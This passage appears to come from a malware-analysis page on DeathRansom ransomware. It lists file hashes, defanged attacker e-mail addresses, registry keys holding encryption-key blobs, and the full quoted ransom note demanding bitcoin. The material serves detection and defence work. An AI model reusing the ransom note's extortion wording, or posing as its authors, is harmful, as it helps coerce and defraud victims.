<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">1536</span><span class="p">:</span><span class="n">gZVYb2bbBisyEcPC00h7sBvvKk</span><span class="o">+</span><span class="n">jTc7</span><span class="o">+</span><span class="n">T8l7RJV62CzVDL</span><span class="o">+</span><span class="n">oWB27evMCUQ</span><span class="p">:</span><span class="n">EV</span><span class="o">+</span><span class="n">GiVEc6RsMJQ</span>
<span class="n">fyukfuyk</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: ab828f0e0555f88e3005387cb523f221a1933bbd7db4f05902a1e5cc289e7ba4</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">6144</span><span class="p">:</span><span class="n">f849</span><span class="o">/</span><span class="n">IB5jZozuL1itPJAOsF0l</span><span class="o">+</span><span class="n">t5Dn0ChC</span><span class="p">:</span><span class="n">f8kIB5jZyNVJWF0AHDC</span>
<span class="mi">2</span><span class="n">p1km7pr6l</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: fedb4c3b0e080fb86796189ccc77f99b04adb105d322bddd3abfca2d5c5d43c8</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">3072</span><span class="p">:</span><span class="n">ou1DaA5w1KmC5RjPquqavANItF2rv8ojAjAD5m9</span><span class="p">:</span><span class="n">Kb6Lq8wHUoe</span>
</pre></div>
<h3>E-Mail Addresses</h3>
<div class="highlight"><pre><span></span><span class="n">death</span><span class="nv">@firemail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">cc</span><span class="w"></span>
<span class="n">death</span><span class="nv">@cumallover</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">me</span><span class="w"></span>
<span class="n">deathransom</span><span class="nv">@airmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">cc</span><span class="w"></span>
</pre></div>
<h3>Registry Keys</h3>
<div class="highlight"><pre><span></span><span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">SOFTWARE</span><span class="err">\</span><span class="n">Wacatac</span>
<span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">SOFTWARE</span><span class="err">\</span><span class="n">Wacatac</span><span class="err">\</span><span class="k">public</span>
<span class="n">FA</span> <span class="n">DE</span> <span class="mi">13</span> <span class="n">AA</span> <span class="mi">52</span> <span class="mi">43</span> <span class="n">DF</span> <span class="mi">85</span> <span class="n">B2</span> <span class="mi">62</span> <span class="n">A5</span> <span class="mi">88</span> <span class="mi">1</span><span class="n">D</span> <span class="mi">17</span> <span class="n">D0</span> <span class="mi">59</span> <span class="mi">99</span> <span class="n">BF</span> <span class="mi">6</span><span class="n">B</span> <span class="mi">69</span> <span class="mi">5</span><span class="n">F</span> <span class="mi">71</span> <span class="mi">1</span><span class="k">C</span> <span class="mi">76</span> <span class="n">D4</span> <span class="mi">4</span><span class="n">A</span> <span class="mi">36</span> <span class="mi">86</span> <span class="n">B6</span> <span class="mi">47</span> <span class="n">CA</span> <span class="n">D4</span> <span class="n">A2</span> <span class="n">C0</span> <span class="mi">40</span> <span class="mi">52</span> <span class="n">D5</span> <span class="n">FF</span> <span class="n">FC</span> <span class="n">B8</span> <span class="n">DE</span> <span class="n">E2</span> <span class="n">F7</span> <span class="mi">7</span><span class="n">F</span> <span class="mi">5</span><span class="n">A</span> <span class="mi">75</span> <span class="mi">27</span> <span class="mi">10</span> <span class="mi">1</span><span class="k">C</span> <span class="mi">64</span> <span class="mi">31</span> <span class="n">CE</span> <span class="mi">55</span> <span class="mi">82</span> <span class="n">FD</span> <span class="mi">91</span> <span class="mi">8</span><span class="n">F</span> <span class="mi">58</span> <span class="mi">65</span> <span class="n">C3</span> <span class="mi">5</span><span class="n">E</span> <span class="mi">49</span> <span class="n">E1</span> <span class="mi">14</span> <span class="n">DD</span> <span class="mi">89</span> <span 
class="mi">9</span><span class="n">B</span> <span class="mi">9</span><span class="k">C</span> <span class="mi">59</span> <span class="n">EB</span> <span class="mi">11</span> <span class="mi">54</span> <span class="n">AC</span> <span class="n">A2</span> <span class="mi">1</span><span class="n">B</span> <span class="mi">8</span><span class="n">A</span> <span class="n">E4</span> <span class="n">DC</span> <span class="mi">62</span> <span class="n">FF</span> <span class="mi">21</span> <span class="mi">1</span><span class="n">A</span> <span class="n">F4</span> <span class="mi">5</span><span class="n">F</span> <span class="mi">44</span> <span class="n">FB</span> <span class="mi">76</span> <span class="mi">1</span><span class="n">A</span> <span class="mi">4</span><span class="k">C</span> <span class="n">D0</span> <span class="mi">07</span> <span class="mi">0</span><span class="n">F</span> <span class="mi">6</span><span class="n">A</span> <span class="mi">83</span> <span class="mi">06</span> <span class="n">B6</span> <span class="mi">32</span> <span class="mi">54</span> <span class="n">B8</span> <span class="mi">9</span><span class="n">B</span> <span class="n">EC</span> <span class="n">EF</span> <span class="mi">0</span><span class="n">F</span> <span class="mi">25</span> <span class="mi">9</span><span class="n">A</span> <span class="n">FD</span> <span class="mi">95</span> <span class="n">AC</span> <span class="mi">5</span><span class="n">B</span> <span class="mi">53</span> <span class="n">D5</span> <span class="mi">9</span><span class="n">F</span> <span class="mi">2</span><span class="n">A</span> <span class="mi">04</span> <span class="n">CC</span> <span class="n">C4</span> <span class="mi">93</span> <span class="mi">6</span><span class="n">A</span> <span class="mi">06</span> <span class="mi">02</span> <span class="mi">7</span><span class="n">D</span> <span class="mi">41</span> <span class="mi">63</span> <span class="n">A8</span> <span class="n">BF</span> <span 
class="n">BB</span> <span class="n">AA</span> <span class="n">E1</span> <span class="mi">1</span><span class="n">F</span> <span class="n">BD</span> <span class="n">E5</span> <span class="n">DA</span> <span class="n">F9</span> <span class="mi">7</span><span class="n">A</span> <span class="mi">46</span> <span class="n">AD</span> <span class="mi">0</span><span class="n">A</span> <span class="mi">89</span> <span class="mi">89</span> <span class="n">D0</span> <span class="n">EC</span> <span class="mi">62</span> <span class="mi">55</span> <span class="n">B5</span> <span class="n">E7</span> <span class="n">A3</span> <span class="n">D4</span> <span class="n">C5</span> <span class="mi">80</span> <span class="n">C7</span> <span class="mi">34</span> <span class="mi">39</span> <span class="mi">1</span><span class="n">D</span> <span class="mi">71</span> <span class="mi">27</span> <span class="mi">60</span> <span class="n">EA</span> <span class="mi">1</span><span class="n">B</span> <span class="mi">45</span> <span class="mi">2</span><span class="n">D</span> <span class="n">A0</span> <span class="mi">90</span> <span class="n">F9</span> <span class="mi">75</span> <span class="n">E8</span> <span class="n">D3</span> <span class="n">A4</span> <span class="n">DF</span> <span class="n">E4</span> <span class="n">C5</span> <span class="n">E0</span> <span class="mi">5</span><span class="k">C</span> <span class="n">BB</span> <span class="n">B8</span> <span class="mi">46</span> <span class="mi">91</span> <span class="mi">87</span> <span class="n">AA</span> <span class="mi">05</span> <span class="n">E3</span> <span class="mi">06</span> <span class="mi">8</span><span class="n">D</span> <span class="n">A0</span> <span class="mi">89</span> <span class="n">F6</span> <span class="mi">12</span> <span class="mi">74</span> <span class="n">B4</span> <span class="n">CA</span> <span class="mi">0</span><span class="n">B</span> <span class="mi">62</span> <span class="n">A0</span> <span 
class="n">F7</span> <span class="n">E3</span> <span class="n">A6</span> <span class="mi">93</span> <span class="mi">0</span><span class="k">C</span> <span class="n">AD</span> <span class="mi">77</span> <span class="n">C3</span> <span class="n">C9</span> <span class="n">A1</span> <span class="n">DE</span> <span class="n">DB</span> <span class="n">A0</span> <span class="mi">0</span><span class="n">F</span> <span class="n">CC</span> <span class="n">D6</span> <span class="n">A2</span> <span class="mi">0</span><span class="k">C</span> <span class="n">DD</span> <span class="n">AB</span> <span class="mi">94</span> <span class="mi">9</span><span class="n">B</span> <span class="mi">25</span> <span class="mi">90</span> <span class="mi">4</span><span class="n">A</span> <span class="n">A4</span> <span class="mi">56</span> <span class="mi">91</span> <span class="n">C4</span> <span class="mi">07</span> <span class="n">BA</span> <span class="mi">13</span> <span class="n">FA</span> <span class="n">E9</span> <span class="mi">44</span> <span class="mi">23</span> <span class="n">FB</span> <span class="mi">3</span><span class="k">C</span> <span class="mi">8</span><span class="n">E</span> <span class="mi">53</span> <span class="n">D2</span> <span class="mi">82</span> <span class="mi">6</span><span class="n">F</span> <span class="n">B5</span> <span class="mi">4</span><span class="n">B</span> <span class="n">C3</span> <span class="n">EE</span> <span class="mi">2</span><span class="n">F</span> <span class="n">E4</span> <span class="mi">1</span><span class="n">F</span> <span class="n">C0</span> <span class="mi">16</span> <span class="mi">03</span> <span class="mi">89</span> <span class="mi">5</span><span class="n">F</span> <span class="n">DE</span> <span class="n">EA</span> <span class="n">E7</span> <span class="mi">76</span> <span class="mi">12</span> <span class="n">A9</span> <span class="n">A3</span> <span class="mi">13</span> <span class="mi">0</span><span class="n">F</span>
<span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">SOFTWARE</span><span class="err">\</span><span class="n">Wacatac</span><span class="err">\</span><span class="n">private</span>
<span class="mi">03</span> <span class="n">F0</span> <span class="n">D6</span> <span class="n">A3</span> <span class="mi">0</span><span class="n">B</span> <span class="n">D6</span> <span class="mi">45</span> <span class="mi">0</span><span class="n">A</span> <span class="n">EF</span> <span class="mi">50</span> <span class="mi">65</span> <span class="mi">59</span> <span class="mi">2</span><span class="n">F</span> <span class="mi">55</span> <span class="mi">95</span> <span class="n">C7</span> <span class="mi">3</span><span class="n">D</span> <span class="n">C9</span> <span class="mi">5</span><span class="n">F</span> <span class="n">C1</span> <span class="n">FC</span> <span class="mi">04</span> <span class="mi">69</span> <span class="mi">68</span> <span class="mi">32</span> <span class="mi">47</span> <span class="mi">74</span> <span class="n">BD</span> <span class="n">F9</span> <span class="mi">72</span> <span class="mi">43</span> <span class="mi">13</span> <span class="mi">4</span><span class="n">D</span> <span class="n">EB</span> <span class="mi">57</span> <span class="n">EB</span> <span class="mi">93</span> <span class="mi">2</span><span class="n">E</span> <span class="mi">6</span><span class="n">F</span> <span class="n">A2</span> <span class="n">C9</span> <span class="n">FB</span> <span class="n">D8</span> <span class="n">AC</span> <span class="mi">99</span> <span class="mi">3</span><span class="n">F</span> <span class="mi">32</span> <span class="mi">1</span><span class="n">E</span> <span class="n">C8</span> <span class="mi">7</span><span class="n">D</span> <span class="mi">4</span><span class="n">E</span> <span class="mi">33</span> <span class="mi">27</span> <span class="n">B6</span> <span class="mi">40</span> <span class="mi">4</span><span class="n">F</span> <span class="mi">0</span><span class="n">A</span> <span class="mi">6</span><span class="n">F</span> <span class="n">B6</span> <span class="mi">6</span><span class="n">A</span> <span class="n">AA</span> <span 
class="mi">80</span> <span class="n">B6</span> <span class="mi">65</span> <span class="n">BA</span> <span class="n">B9</span> <span class="mi">64</span> <span class="n">F1</span> <span class="mi">92</span> <span class="mi">89</span> <span class="n">C7</span> <span class="n">BA</span> <span class="n">F0</span> <span class="n">A1</span> <span class="mi">5</span><span class="n">E</span> <span class="n">A5</span> <span class="mi">95</span> <span class="mi">9</span><span class="k">C</span> <span class="mi">22</span> <span class="mi">62</span> <span class="mi">41</span> <span class="n">DC</span> <span class="mi">5</span><span class="n">B</span> <span class="n">B8</span> <span class="mi">5</span><span class="k">C</span> <span class="mi">8</span><span class="n">A</span> <span class="mi">4</span><span class="n">E</span> <span class="n">DB</span> <span class="mi">45</span> <span class="mi">21</span> <span class="mi">6</span><span class="k">C</span> <span class="n">F7</span> <span class="mi">83</span> <span class="mi">78</span> <span class="mi">5</span><span class="n">E</span> <span class="mi">13</span> <span class="n">E1</span> <span class="mi">01</span> <span class="mi">1</span><span class="n">B</span> <span class="mi">60</span> <span class="mi">32</span> <span class="n">C3</span> <span class="n">E1</span> <span class="mi">00</span> <span class="n">A2</span> <span class="mi">1</span><span class="n">D</span> <span class="mi">9</span><span class="n">B</span> <span class="n">D3</span> <span class="mi">8</span><span class="n">B</span> <span class="mi">66</span> <span class="mi">03</span> <span class="n">DA</span> <span class="mi">7</span><span class="n">A</span> <span class="mi">49</span> <span class="mi">94</span> <span class="mi">8</span><span class="n">B</span> <span class="n">C3</span> <span class="mi">76</span> <span class="mi">7</span><span class="n">F</span> <span class="n">DE</span> <span class="mi">53</span> <span class="mi">88</span> <span class="mi">2</span><span 
class="n">D</span> <span class="mi">25</span> <span class="mi">93</span> <span class="n">B9</span> <span class="mi">90</span> <span class="mi">64</span> <span class="n">F4</span> <span class="mi">2</span><span class="n">F</span> <span class="mi">95</span> <span class="mi">9</span><span class="n">E</span> <span class="n">B9</span> <span class="mi">68</span> <span class="mi">73</span> <span class="n">C3</span> <span class="mi">43</span> <span class="n">D1</span> <span class="n">EF</span> <span class="mi">54</span> <span class="mi">6</span><span class="k">C</span> <span class="mi">8</span><span class="n">B</span> <span class="mi">1</span><span class="n">E</span> <span class="mi">34</span> <span class="mi">7</span><span class="n">A</span> <span class="mi">18</span> <span class="mi">2</span><span class="n">D</span> <span class="mi">87</span> <span class="n">C2</span> <span class="n">A8</span> <span class="mi">95</span> <span class="mi">59</span> <span class="mi">84</span> <span class="n">F9</span> <span class="n">A5</span> <span class="mi">0</span><span class="n">E</span> <span class="n">DE</span> <span class="mi">8</span><span class="n">F</span> <span class="n">CF</span> <span class="mi">93</span> <span class="mi">6</span><span class="n">E</span> <span class="mi">7</span><span class="k">C</span> <span class="n">EC</span> <span class="n">EA</span> <span class="mi">66</span> <span class="n">B7</span> <span class="mi">6</span><span class="n">F</span> <span class="mi">37</span> <span class="mi">05</span> <span class="mi">16</span> <span class="mi">16</span> <span class="mi">20</span> <span class="n">FF</span> <span class="mi">63</span> <span class="n">CD</span> <span class="mi">20</span> <span class="n">E3</span> <span class="mi">16</span> <span class="mi">56</span> <span class="n">EB</span> <span class="mi">11</span> <span class="mi">4</span><span class="n">D</span> <span class="mi">82</span> <span class="mi">73</span> <span class="n">C7</span> <span 
class="mi">9</span><span class="k">C</span> <span class="n">B0</span> <span class="mi">04</span> <span class="mi">17</span> <span class="mi">0</span><span class="n">D</span> <span class="mi">36</span> <span class="mi">61</span> <span class="n">FE</span> <span class="mi">31</span> <span class="mi">81</span> <span class="mi">13</span> <span class="mi">49</span> <span class="n">DF</span> <span class="n">D1</span> <span class="n">A9</span> <span class="mi">88</span> <span class="mi">8</span><span class="n">E</span> <span class="n">EF</span> <span class="n">C8</span> <span class="n">E6</span> <span class="mi">7</span><span class="n">F</span> <span class="mi">6</span><span class="n">D</span> <span class="mi">57</span> <span class="mi">34</span> <span class="mi">68</span> <span class="mi">91</span> <span class="mi">92</span> <span class="mi">7</span><span class="n">B</span> <span class="n">A8</span> <span class="mi">74</span> <span class="mi">41</span> <span class="n">E4</span> <span class="n">B6</span> <span class="n">AA</span> <span class="n">E4</span> <span class="mi">4</span><span class="n">E</span> <span class="n">EF</span> <span class="n">C1</span> <span class="n">FB</span> <span class="n">E5</span> <span class="n">EA</span> <span class="n">B7</span> <span class="n">A9</span> <span class="n">C1</span> <span class="n">F1</span> <span class="n">CC</span> <span class="n">E0</span> <span class="mi">05</span> <span class="mi">2</span><span class="n">A</span> <span class="mi">37</span> <span class="mi">45</span> <span class="n">A1</span> <span class="mi">68</span> <span class="mi">8</span><span class="k">C</span> <span class="n">E1</span> <span class="mi">0</span><span class="n">E</span> <span class="mi">4</span><span class="n">E</span> <span class="n">F3</span> <span class="mi">27</span> <span class="n">CC</span> <span class="mi">52</span> <span class="mi">88</span> <span class="mi">6</span><span class="k">C</span> <span class="n">FF</span> <span class="mi">78</span> 
<span class="n">F6</span> <span class="n">B3</span> <span class="n">A0</span> <span class="mi">19</span> <span class="mi">89</span> <span class="n">E8</span> <span class="n">E2</span> <span class="mi">0</span><span class="k">C</span> <span class="mi">15</span> <span class="mi">6</span><span class="n">B</span> <span class="mi">60</span> <span class="n">D5</span> <span class="mi">5</span><span class="n">E</span> <span class="mi">1</span><span class="n">A</span> <span class="mi">92</span> <span class="mi">53</span> <span class="mi">7</span><span class="n">B</span> <span class="mi">2</span><span class="n">D</span> <span class="mi">0</span><span class="n">B</span> <span class="n">F7</span> <span class="n">D8</span> <span class="mi">12</span> <span class="n">F1</span> <span class="mi">9</span><span class="n">B</span> <span class="n">A4</span> <span class="mi">18</span> <span class="n">E7</span> <span class="n">FF</span> <span class="n">D3</span> <span class="mi">70</span> <span class="mi">94</span> <span class="mi">2</span><span class="n">A</span> <span class="n">A6</span> <span class="mi">91</span> <span class="mi">93</span> <span class="mi">28</span> <span class="n">C0</span> <span class="n">F1</span> <span class="mi">47</span> <span class="n">A4</span> <span class="mi">25</span> <span class="n">A1</span> <span class="n">FC</span> <span class="mi">93</span> <span class="mi">96</span> <span class="mi">36</span> <span class="mi">52</span> <span class="mi">37</span> <span class="n">F8</span> <span class="n">A8</span> <span class="n">F4</span> <span class="mi">24</span> <span class="mi">6</span><span class="n">D</span> <span class="mi">4</span><span class="n">F</span> <span class="mi">12</span> <span class="mi">8</span><span class="n">F</span> <span class="n">FC</span> <span class="mi">0</span><span class="n">E</span> <span class="n">D1</span> <span class="mi">46</span> <span class="mi">22</span> <span class="n">A6</span> <span class="n">B4</span> <span 
class="mi">3</span><span class="n">E</span> <span class="mi">44</span> <span class="mi">40</span> <span class="mi">1</span><span class="n">D</span> <span class="mi">87</span> <span class="mi">11</span> <span class="n">FC</span> <span class="mi">87</span> <span class="mi">9</span><span class="k">C</span> <span class="mi">54</span> <span class="n">E9</span> <span class="mi">56</span> <span class="n">B0</span> <span class="mi">04</span> <span class="mi">3</span><span class="n">A</span> <span class="mi">25</span> <span class="mi">20</span> <span class="n">A0</span> <span class="mi">69</span> <span class="mi">0</span><span class="n">F</span> <span class="n">B2</span> <span class="mi">8</span><span class="n">F</span> <span class="n">A7</span> <span class="n">D6</span> <span class="n">D1</span> <span class="n">D8</span> <span class="mi">79</span> <span class="n">B9</span> <span class="mi">5</span><span class="n">B</span> <span class="mi">61</span> <span class="n">DA</span> <span class="mi">81</span> <span class="n">D6</span> <span class="mi">77</span> <span class="mi">80</span> <span class="mi">34</span> <span class="n">DE</span> <span class="n">FE</span> <span class="n">D5</span> <span class="mi">08</span> <span class="mi">00</span> <span class="mi">04</span> <span class="n">E2</span> <span class="mi">9</span><span class="n">A</span> <span class="mi">6</span><span class="n">B</span> <span class="mi">84</span> <span class="mi">3</span><span class="k">C</span> <span class="mi">87</span> <span class="n">EB</span> <span class="mi">8</span><span class="n">D</span> <span class="mi">7</span><span class="n">F</span> <span class="mi">58</span> <span class="mi">87</span> <span class="n">B5</span> <span class="n">E4</span> <span class="mi">24</span> <span class="n">CC</span> <span class="mi">69</span> <span class="mi">0</span><span class="n">D</span> <span class="mi">41</span> <span class="n">E6</span> <span class="mi">90</span> <span class="mi">25</span> <span class="mi">07</span> 
<span class="mi">6</span><span class="n">B</span> <span class="n">FE</span> <span class="n">A1</span> <span class="mi">4</span><span class="n">E</span> <span class="n">F7</span> <span class="n">C9</span> <span class="mi">20</span> <span class="n">ED</span> <span class="mi">92</span> <span class="mi">0</span><span class="n">A</span> <span class="n">F5</span> <span class="n">E0</span> <span class="mi">96</span> <span class="n">BB</span> <span class="n">B0</span> <span class="mi">85</span> <span class="mi">4</span><span class="n">A</span> <span class="mi">66</span> <span class="mi">6</span><span class="n">A</span> <span class="n">F7</span> <span class="n">FF</span> <span class="mi">5</span><span class="n">B</span> <span class="n">C6</span> <span class="n">E8</span> <span class="mi">2</span><span class="n">F</span> <span class="mi">03</span> <span class="mi">79</span> <span class="n">F4</span> <span class="mi">35</span> <span class="mi">73</span> <span class="mi">54</span> <span class="mi">30</span> <span class="mi">45</span> <span class="n">F5</span> <span class="n">FF</span> <span class="n">AF</span> <span class="mi">75</span> <span class="n">D7</span> <span class="n">FA</span> <span class="mi">9</span><span class="n">B</span> <span class="mi">45</span> <span class="mi">4</span><span class="n">A</span> <span class="mi">77</span> <span class="mi">79</span> <span class="mi">0</span><span class="n">E</span> <span class="n">DC</span> <span class="n">E9</span> <span class="n">D1</span> <span class="mi">86</span> <span class="mi">40</span> <span class="mi">47</span> <span class="mi">18</span> <span class="n">D0</span> <span class="n">CD</span> <span class="n">B6</span> <span class="n">AE</span> <span class="mi">12</span> <span class="mi">90</span> <span class="mi">53</span> <span class="mi">43</span> <span class="n">F7</span> <span class="n">D1</span> <span class="mi">12</span> <span class="n">A3</span> <span class="mi">70</span> <span class="mi">3</span><span 
class="n">A</span> <span class="mi">8</span><span class="n">F</span> <span class="mi">9</span><span class="n">A</span> <span class="mi">45</span> <span class="n">F1</span> <span class="mi">0</span><span class="n">B</span> <span class="mi">0</span><span class="n">B</span> <span class="mi">61</span> <span class="mi">10</span> <span class="n">A8</span> <span class="mi">1</span><span class="n">B</span> <span class="mi">54</span> <span class="mi">15</span> <span class="n">E1</span> <span class="n">F4</span> <span class="n">AB</span> <span class="mi">3</span><span class="n">E</span> <span class="mi">80</span> <span class="n">FA</span> <span class="n">A0</span> <span class="mi">11</span> <span class="mi">55</span> <span class="mi">0</span><span class="k">C</span> <span class="mi">6</span><span class="n">D</span> <span class="mi">24</span> <span class="mi">0</span><span class="n">A</span> <span class="mi">9</span><span class="n">F</span> <span class="mi">22</span> <span class="mi">40</span> <span class="mi">84</span> <span class="n">DC</span> <span class="n">E8</span> <span class="mi">1</span><span class="n">D</span> <span class="mi">07</span> <span class="n">BA</span> <span class="n">A1</span> <span class="mi">16</span> <span class="mi">17</span> <span class="mi">4</span><span class="n">D</span> <span class="mi">06</span> <span class="mi">6</span><span class="n">A</span> <span class="mi">66</span> <span class="n">D4</span> <span class="mi">60</span> <span class="mi">6</span><span class="n">A</span> <span class="mi">2</span><span class="n">A</span> <span class="mi">7</span><span class="n">A</span> <span class="mi">90</span> <span class="mi">0</span><span class="n">E</span> <span class="mi">3</span><span class="n">B</span> <span class="mi">44</span> <span class="n">EC</span> <span class="n">AB</span> <span class="n">B6</span> <span class="n">F9</span> <span class="n">B6</span> <span class="n">E4</span> <span class="n">DE</span> <span class="n">F7</span> <span 
class="mi">7</span><span class="n">D</span> <span class="mi">40</span> <span class="mi">9</span><span class="n">E</span> <span class="mi">9</span><span class="k">C</span> <span class="n">BC</span> <span class="mi">68</span> <span class="mi">37</span> <span class="n">B8</span> <span class="mi">6</span><span class="k">C</span> <span class="mi">97</span> <span class="mi">97</span> <span class="mi">06</span> <span class="mi">87</span> <span class="mi">2</span><span class="n">A</span> <span class="mi">66</span> <span class="n">D4</span> <span class="n">EA</span> <span class="mi">7</span><span class="n">A</span> <span class="n">AD</span> <span class="mi">8</span><span class="n">F</span> <span class="n">DC</span> <span class="mi">96</span> <span class="n">CA</span> <span class="mi">25</span> <span class="n">D3</span> <span class="mi">40</span> <span class="mi">32</span> <span class="n">C5</span> <span class="mi">20</span> <span class="mi">68</span> <span class="mi">64</span> <span class="mi">64</span> <span class="n">CB</span> <span class="mi">76</span> <span class="mi">3</span><span class="n">A</span> <span class="mi">63</span> <span class="n">EE</span> <span class="mi">8</span><span class="k">C</span> <span class="mi">9</span><span class="n">F</span> <span class="n">A1</span> <span class="mi">17</span> <span class="mi">52</span> <span class="n">F3</span>
</pre></div>
<h3>Ransomnote Version 1</h3>
<div class="highlight"><pre><span></span> <span class="o">--=</span> <span class="n">DEATHRANSOM</span> <span class="o">=---</span>
<span class="o">***********************</span><span class="n">UNDER</span> <span class="nb">NO</span> <span class="n">CIRCUMSTANCES</span> <span class="n">DO</span> <span class="n">NOT</span> <span class="n">DELETE</span> <span class="n">THIS</span> <span class="kt">FILE</span><span class="p">,</span> <span class="n">UNTIL</span> <span class="n">ALL</span> <span class="n">YOUR</span> <span class="n">DATA</span> <span class="n">IS</span> <span class="n">RECOVERED</span><span class="o">***********************</span>
<span class="o">*****</span><span class="n">FAILING</span> <span class="n">TO</span> <span class="n">DO</span> <span class="n">SO</span><span class="p">,</span> <span class="n">WILL</span> <span class="n">RESULT</span> <span class="n">IN</span> <span class="n">YOUR</span> <span class="n">SYSTEM</span> <span class="n">CORRUPTION</span><span class="p">,</span> <span class="n">IF</span> <span class="n">THERE</span> <span class="n">ARE</span> <span class="n">DECRYPTION</span> <span class="n">ERRORS</span><span class="o">*****</span>
<span class="n">All</span> <span class="n">your</span> <span class="n">files</span><span class="p">,</span> <span class="n">documents</span><span class="p">,</span> <span class="n">photos</span><span class="p">,</span> <span class="n">databases</span> <span class="n">and</span> <span class="n">other</span> <span class="n">important</span>
<span class="n">files</span> <span class="n">are</span> <span class="n">encrypted</span><span class="p">.</span>
<span class="n">You</span> <span class="n">are</span> <span class="n">not</span> <span class="n">able</span> <span class="n">to</span> <span class="n">decrypt</span> <span class="n">it</span> <span class="n">by</span> <span class="n">yourself</span><span class="o">!</span> <span class="n">The</span> <span class="n">only</span> <span class="n">method</span>
<span class="n">of</span> <span class="n">recovering</span> <span class="n">files</span> <span class="n">is</span> <span class="n">to</span> <span class="n">purchase</span> <span class="n">an</span> <span class="n">unique</span> <span class="n">private</span> <span class="n">key</span><span class="p">.</span>
<span class="n">Only</span> <span class="n">we</span> <span class="n">can</span> <span class="n">give</span> <span class="n">you</span> <span class="n">this</span> <span class="n">key</span> <span class="n">and</span> <span class="n">only</span> <span class="n">we</span> <span class="n">can</span> <span class="n">recover</span> <span class="n">your</span> <span class="n">files</span><span class="p">.</span>
<span class="n">To</span> <span class="n">be</span> <span class="n">sure</span> <span class="n">we</span> <span class="n">have</span> <span class="n">the</span> <span class="n">decryptor</span> <span class="n">and</span> <span class="n">it</span> <span class="n">works</span> <span class="n">you</span> <span class="n">can</span> <span class="n">send</span> <span class="n">an</span>
<span class="n">email</span> <span class="n">death</span><span class="p">@</span><span class="n">firemail</span><span class="p">.</span><span class="n">cc</span> <span class="n">and</span> <span class="n">decrypt</span> <span class="n">one</span> <span class="n">file</span> <span class="k">for</span> <span class="n">free</span><span class="p">.</span> <span class="n">But</span> <span class="n">this</span>
<span class="n">file</span> <span class="n">should</span> <span class="n">be</span> <span class="n">of</span> <span class="n">not</span> <span class="n">valuable</span><span class="o">!</span>
<span class="n">Do</span> <span class="n">you</span> <span class="n">really</span> <span class="n">want</span> <span class="n">to</span> <span class="n">restore</span> <span class="n">your</span> <span class="n">files</span><span class="o">?</span>
<span class="n">Write</span> <span class="n">to</span> <span class="n">email</span>
<span class="n">death</span><span class="p">@</span><span class="n">cumallover</span><span class="p">[.]</span><span class="n">me</span>
<span class="n">death</span><span class="p">@</span><span class="n">firemail</span><span class="p">[.]</span><span class="n">cc</span>
<span class="n">Your</span> <span class="n">LOCK</span><span class="o">-</span><span class="nl">ID</span><span class="p">:</span> <span class="p">[</span><span class="n">Redacted</span> <span class="n">Base64</span><span class="p">]</span>
<span class="o">>>></span><span class="n">How</span> <span class="n">to</span> <span class="n">obtain</span> <span class="nl">bitcoin</span><span class="p">:</span>
<span class="n">The</span> <span class="n">easiest</span> <span class="n">way</span> <span class="n">to</span> <span class="n">buy</span> <span class="n">bitcoins</span> <span class="n">is</span> <span class="n">LocalBitcoins</span> <span class="n">site</span><span class="p">.</span> <span class="n">You</span> <span class="n">have</span> <span class="n">to</span> <span class="k">register</span><span class="p">,</span> <span class="n">click</span> <span class="err">'</span><span class="n">Buy</span> <span class="n">bitcoins</span><span class="err">'</span><span class="p">,</span> <span class="n">and</span> <span class="n">select</span> <span class="n">the</span> <span class="n">seller</span> <span class="n">by</span> <span class="n">payment</span> <span class="n">method</span> <span class="n">and</span> <span class="n">price</span><span class="p">.</span>
<span class="nl">hxxps</span><span class="p">:</span><span class="c1">//localbitcoins[.]com/buy_bitcoins</span>
<span class="n">Also</span> <span class="n">you</span> <span class="n">can</span> <span class="n">find</span> <span class="n">other</span> <span class="n">places</span> <span class="n">to</span> <span class="n">buy</span> <span class="n">Bitcoins</span> <span class="n">and</span> <span class="n">beginners</span> <span class="n">guide</span> <span class="nl">here</span><span class="p">:</span>
<span class="nl">hxxp</span><span class="p">:</span><span class="c1">//www.coindesk[.]com/information/how-can-i-buy-bitcoins/</span>
<span class="o">>>></span> <span class="n">Free</span> <span class="n">decryption</span> <span class="n">as</span> <span class="n">guarantee</span><span class="o">!</span>
<span class="n">Before</span> <span class="n">paying</span> <span class="n">you</span> <span class="n">send</span> <span class="n">us</span> <span class="n">up</span> <span class="n">to</span> <span class="mi">1</span> <span class="n">file</span> <span class="k">for</span> <span class="n">free</span> <span class="n">decryption</span><span class="p">.</span>
<span class="n">We</span> <span class="n">recommeded</span> <span class="n">to</span> <span class="n">send</span> <span class="n">pictures</span><span class="p">,</span> <span class="n">text</span> <span class="n">files</span><span class="p">,</span> <span class="n">sheets</span><span class="p">,</span> <span class="n">etc</span><span class="p">.</span> <span class="p">(</span><span class="n">files</span> <span class="n">no</span> <span class="n">more</span> <span class="n">than</span> <span class="mi">1</span><span class="n">mb</span><span class="p">)</span>
<span class="n">IN</span> <span class="n">ORDER</span> <span class="n">TO</span> <span class="n">PREVENT</span> <span class="n">DATA</span> <span class="nl">DAMAGE</span><span class="p">:</span>
<span class="mf">1.</span> <span class="n">Do</span> <span class="n">not</span> <span class="n">rename</span> <span class="n">encrypted</span> <span class="n">files</span><span class="p">.</span>
<span class="mf">2.</span> <span class="n">Do</span> <span class="n">not</span> <span class="n">try</span> <span class="n">to</span> <span class="n">decrypt</span> <span class="n">your</span> <span class="n">data</span> <span class="n">using</span> <span class="n">third</span> <span class="n">party</span> <span class="n">software</span><span class="p">,</span> <span class="n">it</span> <span class="n">may</span> <span class="n">cause</span> <span class="n">permanent</span> <span class="n">data</span> <span class="n">loss</span><span class="p">.</span>
